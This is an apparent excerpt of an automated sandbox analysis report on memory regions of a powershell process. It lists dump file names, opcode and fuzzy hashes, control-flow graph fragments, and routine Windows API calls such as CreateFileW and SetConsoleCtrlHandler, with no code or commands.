        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: HJ$HJ$HJ$HJ$HJ$HJ
        • API String ID: 0-2282386358
        • Opcode ID: eb8d5c97f18c9e613fe0b36ff9025bc4b70fc19e8eaa58975ecbc5f6e7add786
        • Instruction ID: 5fe336abf8886a13831658fe7d148312da85c43bd13ead395ed108cab6b1c389
        • Opcode Fuzzy Hash: eb8d5c97f18c9e613fe0b36ff9025bc4b70fc19e8eaa58975ecbc5f6e7add786
        • Instruction Fuzzy Hash: 60D1B1B0B142058BDB24DFB4D4846EEBBE2EF84308F15847CE506AB392DB75AD45CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2193 116dea8-116dedb call 116d69c 2197 116df06-116df9c 2193->2197 2198 116dedd-116df05 2193->2198 2207 116dfa4-116dfdf CreateFileW 2197->2207 2208 116df9e-116dfa1 2197->2208 2209 116dfe1-116dfe7 2207->2209 2210 116dfe8-116e005 2207->2210 2208->2207 2209->2210
        Memory Dump Source
        • Source File: 00000016.00000002.516072844.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_1160000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 89bf693206d48ab55aee06d456bc3db10f0054d72330734897a5e0a0f6607876
        • Instruction ID: 0f9cfccf450dd9072f3d5b08b8a80f3fcaba63d79c70e6300b7b0567aef112bb
        • Opcode Fuzzy Hash: 89bf693206d48ab55aee06d456bc3db10f0054d72330734897a5e0a0f6607876
        • Instruction Fuzzy Hash: 0241CF71A042099FDB04CFA8D845BAAFFB5FB48314F058169E609AB381C7759940CBE1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2213 7c88000-7c88012 call 7c8727c 2216 7c88018-7c8805d 2213->2216 2217 7c88014-7c88017 2213->2217 2223 7c88079-7c880aa 2216->2223 2224 7c8805f-7c88073 2216->2224 2227 7c880ac-7c880b4 2223->2227 2228 7c880b6-7c880f0 SetConsoleCtrlHandler 2223->2228 2224->2223 2227->2228 2229 7c880f9-7c8812d 2228->2229 2230 7c880f2-7c880f8 2228->2230 2230->2229
        Memory Dump Source
        • Source File: 00000016.00000002.520632099.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7c80000_powershell.jbxd
        Similarity
        • API ID: ConsoleCtrlHandler
        • String ID:
        • API String ID: 1513847179-0
        • Opcode ID: da91ce6ed2616d0fe12b83f4f30f5a06b3f54385469fa0f95528dc60f54ccef0
        • Instruction ID: 67f6177661c906a9bb95b72d9762c32206dec66315aad5c3a1e85998a05b84f8
        • Opcode Fuzzy Hash: da91ce6ed2616d0fe12b83f4f30f5a06b3f54385469fa0f95528dc60f54ccef0
        • Instruction Fuzzy Hash: 2D31DEB19042098FCB10DFA9D844BEEBBF5AF89314F15806AD418E7781DB389D45CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 07C880E3
        Memory Dump Source
        • Source File: 00000016.00000002.520632099.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7c80000_powershell.jbxd
        Similarity
        • API ID: ConsoleCtrlHandler
        • String ID:
        • API String ID: 1513847179-0
        • Opcode ID: b74a29b6cee52e6efd01e2757b6c465c7867ce37a5558927c707800a078616d4
        • Instruction ID: dd6ecbdc8c22e74da807bd58775e750e14fa85aa321cbfe83c25671af451c643
        • Opcode Fuzzy Hash: b74a29b6cee52e6efd01e2757b6c465c7867ce37a5558927c707800a078616d4
        • Instruction Fuzzy Hash: 7231E3B28142458FCB10CF99C884BEEBBF0EF55314F15846ED054A7781D734AA45CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 07C880E3
        Memory Dump Source
        • Source File: 00000016.00000002.520632099.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7c80000_powershell.jbxd
        Similarity
        • API ID: ConsoleCtrlHandler
        • String ID:
        • API String ID: 1513847179-0
        • Opcode ID: f1903c3fc2cd160626de5ba0eb365d93080f23b7fbd0272b548e4503cf8cd04d
        • Instruction ID: 566a373e5a47547b66f23c0a2c2a31a384cfb12ffdeff123c961c9df33b5a77c
        • Opcode Fuzzy Hash: f1903c3fc2cd160626de5ba0eb365d93080f23b7fbd0272b548e4503cf8cd04d
        • Instruction Fuzzy Hash: 2931AEB19042068FCB10DFAAC884BEEBBF1FB85314F14846ED015A7681DB38A945CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 07C880E3
        Memory Dump Source
        • Source File: 00000016.00000002.520632099.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7c80000_powershell.jbxd
        Similarity
        • API ID: ConsoleCtrlHandler
        • String ID:
        • API String ID: 1513847179-0
        • Opcode ID: 12d7188f251660e97f6216dd5fc294df791449af4b5071645157ffdd15e5639f
        • Instruction ID: 0a8b13173961e54d2704609ec9c31dc5189997df5d9eaaa34262737d9443c493
        • Opcode Fuzzy Hash: 12d7188f251660e97f6216dd5fc294df791449af4b5071645157ffdd15e5639f
        • Instruction Fuzzy Hash: FE215CB1D102098FCB50DF99C844BEEBBF1AF88314F558429D419B7741DB38A945CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0116DEC7,00000000,00000000,00000003,00000000,00000002), ref: 0116DFD2
        Memory Dump Source
        • Source File: 00000016.00000002.516072844.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_1160000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 4302f5d128358710777dda8c0aa4af0b00d1f7efdbef7bf24c55c67c90766768
        • Instruction ID: 40be9ddd38ac9350c2ade8a25c8c196bce455ad36aacc07c1d2aac5aae1aa9ff
        • Opcode Fuzzy Hash: 4302f5d128358710777dda8c0aa4af0b00d1f7efdbef7bf24c55c67c90766768
        • Instruction Fuzzy Hash: 7A2125B1904259ABCF14CFD9D884ADEFBB4FB48310F04816AE919A7200C775A965CFE2
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0116DEC7,00000000,00000000,00000003,00000000,00000002), ref: 0116DFD2
        Memory Dump Source
        • Source File: 00000016.00000002.516072844.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_1160000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: df42de53bd6c0ab086979852bc68762a325e932f696c1db5a72bec1ca148785a
        • Instruction ID: 9f5516b5fd03cf6c87160c96813e7c6114b1e33fc8abd8b479978692b385d8d3
        • Opcode Fuzzy Hash: df42de53bd6c0ab086979852bc68762a325e932f696c1db5a72bec1ca148785a
        • Instruction Fuzzy Hash: D92145B2900249EFCF14CF99D884ADEFBB4FB49310F04811AE919A3210C735A950CFA2
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 01169D70
        Memory Dump Source
        • Source File: 00000016.00000002.516072844.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_1160000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: f7971f97c8ba453e7446f9620b07fcf7052821112e3f021096e9d6e69998bdf8
        • Instruction ID: eed0c565353bd4c229ec67a420c5d36c146684951040e908a8db15edb09ed05d
        • Opcode Fuzzy Hash: f7971f97c8ba453e7446f9620b07fcf7052821112e3f021096e9d6e69998bdf8
        • Instruction Fuzzy Hash: 502133B1D046599FCB14CF9AD844B9EFBB8FB48368F01812AE919B7200D775A914CFE1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 01169D70
        Memory Dump Source
        • Source File: 00000016.00000002.516072844.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_1160000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 226a62ba208ca42633402d1975975d3e48a3679c2e25ad62bace22a4bcac991b
        • Instruction ID: 99a8c233bc16091e51bf1a21282caa78399b234c700d6d4f6fccb1744c99a33b
        • Opcode Fuzzy Hash: 226a62ba208ca42633402d1975975d3e48a3679c2e25ad62bace22a4bcac991b
        • Instruction Fuzzy Hash: D72147B1D006599FCB14CF9AD444B9EFBB4FF48364F01812AD919B7200C734A915CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 01169D70
        Memory Dump Source
        • Source File: 00000016.00000002.516072844.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_1160000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 9708a2df4fd6b348aaa119387d98fe224f47c7c9ceb9678a7cfb88d8e0af5cb7
        • Instruction ID: 33aa3dc5a5e1f005ed747e8bd0022cb204ec09a022d641c62345bef3e372d325
        • Opcode Fuzzy Hash: 9708a2df4fd6b348aaa119387d98fe224f47c7c9ceb9678a7cfb88d8e0af5cb7
        • Instruction Fuzzy Hash: 441193719082468FCB04DF59D480BCDBBB0FF5531CF158AA9E1589B221D375E94ACBD1
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: HJ
        • API String ID: 0-775665175
        • Opcode ID: 7465cdc501acd070a44af897f1a46c406665426087e4e3c9c85b36566667881c
        • Instruction ID: c880cc233be7f9aa9ec9cb9aed81b4cadd68758e7e33cde0550dd0bfca116a32
        • Opcode Fuzzy Hash: 7465cdc501acd070a44af897f1a46c406665426087e4e3c9c85b36566667881c
        • Instruction Fuzzy Hash: AC916B71A01219CFDB24DB65C894BDEB7F6FF88300F1581A9E509A7290DB349D45CFA0
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2025a18042214eccf281fa14370072e045e14d035cb48324d23ad057f629cbee
        • Instruction ID: 2365b0d7345d965d251cfe6ec52dada1b067900d5e69318562a48982977b3e64
        • Opcode Fuzzy Hash: 2025a18042214eccf281fa14370072e045e14d035cb48324d23ad057f629cbee
        • Instruction Fuzzy Hash: A151B035B101189FDB05EBA4D851BEEBBABEB88304F118069E605A7395CF35DD028BE5
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a405da5d2307836ef3d53639b44a334f09aba8c668ec6ce961b13da66b14fe6d
        • Instruction ID: 0cc59bc63646109075a221009ebc9346c984d6b868abe46eca137b49a50e7ec7
        • Opcode Fuzzy Hash: a405da5d2307836ef3d53639b44a334f09aba8c668ec6ce961b13da66b14fe6d
        • Instruction Fuzzy Hash: 3A51D1B1900329DFDB24CF59C884BDABBB5FB49304F1084A9E909B7250DB756E85CF91
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: dcce3cc944a8504277bd9d1000868628de32285be566c0948b5c32acd182289e
        • Instruction ID: 70f42ccba683f1be5d4271c7b72589042c8c8182491c7867d8ded4a43108f8fa
        • Opcode Fuzzy Hash: dcce3cc944a8504277bd9d1000868628de32285be566c0948b5c32acd182289e
        • Instruction Fuzzy Hash: 9F415EB0A012199BDB24DBA4D490EEEBBB6EF45308F108579D406BB741DF34AD49CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9472bc21d143878c40884e07c06e919302d059cdc8c8cf53a7c0f40ed3b875f5
        • Instruction ID: 973078c0f7367d718238075ca26043fe20e1e8fd497d55c07900cafc93841b81
        • Opcode Fuzzy Hash: 9472bc21d143878c40884e07c06e919302d059cdc8c8cf53a7c0f40ed3b875f5
        • Instruction Fuzzy Hash: 4B110D3210010AAFCF529F94D940CDE3F76FF48358B454619FA459A130D736E965EB90
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c98fb810b2dc7e6477be800e9a80589eafefb80b8b065d0c3dd4d33a7de3a06c
        • Instruction ID: b6eea49af0219f4af4c4f63f3c3c376a8b6d29900c6f843cc4930b3ce67169c5
        • Opcode Fuzzy Hash: c98fb810b2dc7e6477be800e9a80589eafefb80b8b065d0c3dd4d33a7de3a06c
        • Instruction Fuzzy Hash: 21F0CF3210414ABB8F62AE95DD40CDE3F76FF88658B494619FA4856120C632E865EB90
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6ce48dc72bdc739ff4f559634045dc1c2ab24ccd61b0965643409a4385013d89
        • Instruction ID: b2a366eacb5783916c9d2869dda2869bfea0d5a07c46b241c43da02f3843f94d
        • Opcode Fuzzy Hash: 6ce48dc72bdc739ff4f559634045dc1c2ab24ccd61b0965643409a4385013d89
        • Instruction Fuzzy Hash: 15E06536B1021497CB1496A9D8148EE77AAEBC9221F04407ED906E7744DFB59C058BA1
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000016.00000002.520684914.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_22_2_7cb0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bd34f9b8ffef80ec8d64b242da9386e303a0f1f80649d7bbe713d00dde471691
        • Instruction ID: fc5e2b52d96c1b30817dff2fb7273c82505575aa209e7ff5ca960a85de79b984
        • Opcode Fuzzy Hash: bd34f9b8ffef80ec8d64b242da9386e303a0f1f80649d7bbe713d00dde471691
        • Instruction Fuzzy Hash: C2D0C27270952543C739151AA4487AB3B9ACBC0B21F09403AE509C7355CE64CE4182D1
        Uniqueness

        Uniqueness Score: -1.00%